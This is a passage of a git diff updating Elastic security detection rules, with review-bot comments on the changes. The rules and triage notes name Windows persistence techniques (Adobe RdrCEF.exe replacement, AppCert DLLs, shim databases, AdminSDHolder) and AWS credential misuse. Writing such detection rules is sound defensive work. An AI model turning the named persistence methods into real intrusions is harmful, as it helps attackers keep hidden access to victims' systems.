impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts 
are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], + "related_integrations": [], "risk_score": 21, "rule_id": "dca28dee-c999-400f-b640-50a081cc0fd1", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -26,5 +28,5 @@ "ML" ], "type": "machine_learning", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_user.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_user.json index 53f9fab8d1b48..332623363bc32 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_user.json 
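Review bot: The false-positive section of the new `note` still ends with "You can find the command in the `event.action field` field." — the backticks swallow the word "field", so the rendered guidance names a field that does not exist; it should read "You can find the command in the `event.action` field." The new `setup` text tells users the AWS Fleet integration or Filebeat module is required, yet `related_integrations` is added as `[]`, while the Okta rules in this same change declare their package there; if the registry accepts it for machine-learning rules, the AWS package should be listed so the dependency is machine-readable rather than prose only. One caveat worth adding to the "Reset passwords or delete API keys" step: deactivating or deleting a long-term access key does not end role sessions already obtained with it, so the response section should also mention revoking active role sessions (AWS documents a deny condition on token issue time for this) before treating the attacker's access as closed.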
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_user.json 
@@ -12,12 +12,14 @@ "license": "Elastic License v2", "machine_learning_job_id": "rare_method_for_a_username", "name": "Unusual AWS Command for a User", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n## Triage and analysis\n\n### Investigating an Unusual CloudTrail Event\n\nDetection alerts from this rule indicate an AWS API command or method call that is rare and unusual for the calling IAM user. Here are some possible avenues of investigation:\n- Consider the user as identified by the `user.name` field. Is this command part of an expected workflow for the user context? Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context. The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Consider the source IP address and geolocation for the calling user who issued the command. Do they look normal for the calling user? If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts, or could it be sourcing from an EC2 instance that's not under your control? If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. If the user is a human, not a program or script, did the activity take place during a normal time of day?\n- Examine the history of the command. If the command, which is visible in the `event.action field`, only manifested recently, it might be part of a new automation module or script. 
If it has a consistent cadence (for example, if it appears in small numbers on a weekly or monthly cadence), it might be part of a housekeeping or maintenance process.\n- Examine the request parameters. These may provide indications as to the source of the program or the nature of the tasks it is performing.", + "note": "## Triage and analysis\n\n### Investigating Unusual AWS Command for a User\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and\nunderstanding what is considered normal behavior within an organization, you can spot suspicious or malicious activity\nwhen deviations occur.\n\nThis rule uses a machine learning job to detect an AWS API command that while not inherently suspicious or abnormal, is\nbeing made by a user context that does not normally use the command. This can be the result of compromised credentials or\nkeys as someone uses a valid account to persist, move laterally, or exfiltrate data.\n\nDetection alerts from this rule indicate an AWS API command or method call that is rare and unusual for the calling IAM\nuser.\n\n#### Possible investigation steps\n\n- Identify the user account involved and the action performed. Verify whether it should perform this kind of action.\n - Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the \n `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context.\n - The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, or network administrator activity.\n- Examine the request parameters. 
These might indicate the source of the program or the nature of its tasks.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. If the user is a human (not a program or script), did the activity take place during a normal\ntime of day?\n- Contact the account owner and confirm whether they are aware of this activity if suspicious.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- Examine the history of the command. If the command only manifested recently, it might be part of a new automation\nmodule or script. If it has a consistent cadence (for example, it appears in small numbers on a weekly or monthly cadence),\nit might be part of a housekeeping or maintenance process. 
You can find the command in the `event.action field` field.\n\n### Related Rules\n\n- Unusual City For an AWS Command - 809b70d3-e2c3-455e-af1b-2626a5a1a276\n- Unusual Country For an AWS Command - dca28dee-c999-400f-b640-50a081cc0fd1\n- Rare AWS Error Code - 19de8096-e2b0-4bd8-80c9-34a820813fff\n- Spike in AWS Error Messages - 78d3d8d9-b476-451d-a9e0-7a5addd70670\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], + "related_integrations": [], "risk_score": 21, "rule_id": "ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -26,5 +28,5 @@ "ML" ], "type": "machine_learning", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_delete_okta_policy_rule.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_delete_okta_policy_rule.json deleted file mode 100644 index d865bda9c3a6f..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_delete_okta_policy_rule.json +++ /dev/null 
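Review bot: The new `note` has the same wording defect as the sibling AWS rules — "You can find the command in the `event.action field` field." — which should be "You can find the command in the `event.action` field." so the analyst is pointed at a real ECS field name. The investigation steps also use two different look-back windows without saying why: "Investigate other alerts associated with the user account during the past 48 hours" versus "scope potentially compromised assets ... in the last 24 hours"; if the shorter window is intentional (scoping only after compromise is suspected) a half-sentence saying so would stop analysts from reading it as a typo, otherwise align both to 48 hours. As with the country rule, `related_integrations` is `[]` although `setup` names the AWS Fleet integration, which looks inconsistent with how the Okta rules in this change are filled in.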
@@ -1,37 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
- "description": "Detects attempts to delete a rule within an Okta policy. An adversary may attempt to delete an Okta policy rule in order to weaken an organization's security controls.",
- "false_positives": [
- "Consider adding exceptions to this rule to filter false positives if Okta MFA rules are regularly modified in your organization."
- ],
- "index": [
- "filebeat-*",
- "logs-okta*"
- ],
- "language": "kuery",
- "license": "Elastic License v2",
- "name": "Attempt to Delete an Okta Policy Rule",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:okta.system and event.action:policy.rule.delete\n",
- "references": [
- "https://help.okta.com/en/prod/Content/Topics/Security/Security_Policies.htm",
- "https://developer.okta.com/docs/reference/api/system-log/",
- "https://developer.okta.com/docs/reference/api/event-types/"
- ],
- "risk_score": 21,
- "rule_id": "d5d86bf5-cf0c-4c06-b688-53fdc072fdfd",
- "severity": "low",
- "tags": [
- "Elastic",
- "Identity",
- "Okta",
- "Continuous Monitoring",
- "SecOps",
- "Monitoring"
- ],
- "timestamp_override": "event.ingested",
- "type": "query",
- "version": 4
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_policy_rule.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_policy_rule.json
deleted file mode 100644
index cae49f5789b29..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_policy_rule.json
+++ /dev/null
@@ -1,37 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
- "description": "Detects attempts to modify a rule within an Okta policy. An adversary may attempt to modify an Okta policy rule in order to weaken an organization's security controls.",
- "false_positives": [
- "Consider adding exceptions to this rule to filter false positives if Okta MFA rules are regularly modified in your organization."
- ],
- "index": [
- "filebeat-*",
- "logs-okta*"
- ],
- "language": "kuery",
- "license": "Elastic License v2",
- "name": "Attempt to Modify an Okta Policy Rule",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:okta.system and event.action:policy.rule.update\n",
- "references": [
- "https://help.okta.com/en/prod/Content/Topics/Security/Security_Policies.htm",
- "https://developer.okta.com/docs/reference/api/system-log/",
- "https://developer.okta.com/docs/reference/api/event-types/"
- ],
- "risk_score": 21,
- "rule_id": "000047bb-b27a-47ec-8b62-ef1a5d2c9e19",
- "severity": "low",
- "tags": [
- "Elastic",
- "Identity",
- "Okta",
- "Continuous Monitoring",
- "SecOps",
- "Identity and Access"
- ],
- "timestamp_override": "event.ingested",
- "type": "query",
- "version": 6
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_threat_detected_by_okta_threatinsight.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_threat_detected_by_okta_threatinsight.json
index c2225b53e30b6..69080835ad338 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_threat_detected_by_okta_threatinsight.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_threat_detected_by_okta_threatinsight.json
@@ -10,14 +10,33 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Threat Detected by Okta ThreatInsight",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:okta.system and event.action:security.threat.detected\n",
 "references": [
 "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/"
 ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "6885d2ae-e008-4762-b98a-e8e1cd3a81e9",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -29,5 +48,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_account_creation_hide_at_logon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_account_creation_hide_at_logon.json
index dc8a5ba10fa00..38b910adbb332 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_account_creation_hide_at_logon.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_account_creation_hide_at_logon.json
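Review bot: Replacing the old "## Config" text with `"note": ""` leaves a medium-severity rule with no investigation guidance at all, whereas the AWS ML rules in this same change gained full "Triage and analysis" sections; now that the integration requirement lives in `setup`, the empty string is only a placeholder. Either drop the `note` key (if the rule schema allows it to be absent) or give it a minimal triage note — which actor and client address the Okta system-log event names, whether the ThreatInsight detection was followed by a successful sign-in for that actor, and whether the source address is already on the organisation's Okta network zone block list — so an analyst receiving this alert has somewhere to start. The `related_integrations` pin to `okta` `1.3.0` reads as a minimum compatible package version; a short comment in the PR description saying whether that is a floor or an exact match would help whoever bumps it next.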
@@ -15,6 +15,28 @@
 "references": [
 "https://support.apple.com/en-us/HT203998"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "41b638a1-8ab6-4f8e-86d9-466317ef2db5",
 "severity": "medium",
@@ -51,5 +73,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 1
+ "version": 2
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ad_adminsdholder.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ad_adminsdholder.json
index cc94c5962192b..77fa84782d7cc 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ad_adminsdholder.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ad_adminsdholder.json
@@ -16,6 +16,23 @@
 "https://adsecurity.org/?p=1906",
 "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory#adminsdholder"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.code",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.ObjectDN",
+ "type": "unknown"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "6e9130a5-9be6-48e5-943a-9628bfc74b18",
 "severity": "high",
@@ -40,5 +57,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 2
+ "version": 3
 }
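Review bot: In the AdminSDHolder hunk the non-ECS entry is declared as `{"ecs": false, "name": "winlog.event_data.ObjectDN", "type": "unknown"}`, and `unknown` means the required-fields check cannot tell whether the index actually maps that field in a way the query can match. If the Windows integration maps `winlog.event_data.*` as keyword (which seems likely but is not visible here), declaring `"type": "keyword"` makes the rule's prerequisite enforceable; if the type genuinely varies across data sources, a one-line explanation in the PR description would save the next editor from "fixing" it. This is a high-severity (73) rule, so a silently unmapped ObjectDN would mean missed detections rather than noise.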
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_administrator_privileges_assigned_to_okta_group.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_administrator_privileges_assigned_to_okta_group.json
index 071fb643083a1..e1f51b2826e3a 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_administrator_privileges_assigned_to_okta_group.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_administrator_privileges_assigned_to_okta_group.json
@@ -13,15 +13,34 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Administrator Privileges Assigned to an Okta Group",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:okta.system and event.action:group.privilege.grant\n",
 "references": [
 "https://help.okta.com/en/prod/Content/Topics/Security/administrators-admin-comparison.htm",
 "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/"
 ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "b8075894-0b62-46e5-977c-31275da34419",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -50,5 +69,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_administrator_role_assigned_to_okta_user.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_administrator_role_assigned_to_okta_user.json
index eccd892913023..fbcf196cb1680 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_administrator_role_assigned_to_okta_user.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_administrator_role_assigned_to_okta_user.json
@@ -13,15 +13,34 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Administrator Role Assigned to an Okta User",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:okta.system and event.action:user.account.privilege.grant\n",
 "references": [
 "https://help.okta.com/en/prod/Content/Topics/Security/administrators-admin-comparison.htm",
 "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/"
 ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "f06414a6-f2a4-466d-8eba-10f85e8abf71",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -49,5 +68,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 4
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_adobe_hijack_persistence.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_adobe_hijack_persistence.json index 2048d4597b117..ccedd9bfbd6ad 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_adobe_hijack_persistence.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_adobe_hijack_persistence.json 
@@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Adobe Hijack Persistence", - "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched\nwhenever Adobe Acrobat Reader is executed.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched\nwhenever Adobe Acrobat Reader is executed.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "file where event.type == \"creation\" and\n file.path : (\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\") and\n not process.name : \"msiexec.exe\"\n", "references": [ "https://twitter.com/pabraeken/status/997997818362155008" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "2bf78aa2-9c56-48de-b139-f169bf99cf86", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -53,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 11 + "version": 13 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_app_compat_shim.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_app_compat_shim.json
index 0b746cb381898..c17a4648b780e 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_app_compat_shim.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_app_compat_shim.json
@@ -13,6 +13,33 @@
 "license": "Elastic License v2",
 "name": "Installation of Custom Shim Databases",
 "query": "sequence by process.entity_id with maxspan = 5m\n [process where event.type in (\"start\", \"process_started\") and\n not (process.name : \"sdbinst.exe\" and process.parent.name : \"msiexec.exe\")]\n [registry where event.type in (\"creation\", \"change\") and\n registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\*.sdb\"]\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.entity_id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "registry.path",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "c5ce48a6-7f57-4ee8-9313-3d0024caee10",
 "severity": "medium",
@@ -48,5 +75,5 @@
 }
 ],
 "type": "eql",
- "version": 3
+ "version": 4
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_appcertdlls_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_appcertdlls_registry.json
index c7c6f3f4ba60a..a535a98df43e1 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_appcertdlls_registry.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_appcertdlls_registry.json
@@ -12,10 +12,18 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Registry Persistence via AppCert DLL",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "registry where\n/* uncomment once stable length(bytes_written_string) > 0 and */\n registry.path : \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "registry.path",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "513f0ffd-b317-4b9c-9494-92ce861f22c7",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -50,5 +58,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_appinitdlls_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_appinitdlls_registry.json
index c61d7e11291c6..9af2e067c4c18 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_appinitdlls_registry.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_appinitdlls_registry.json 
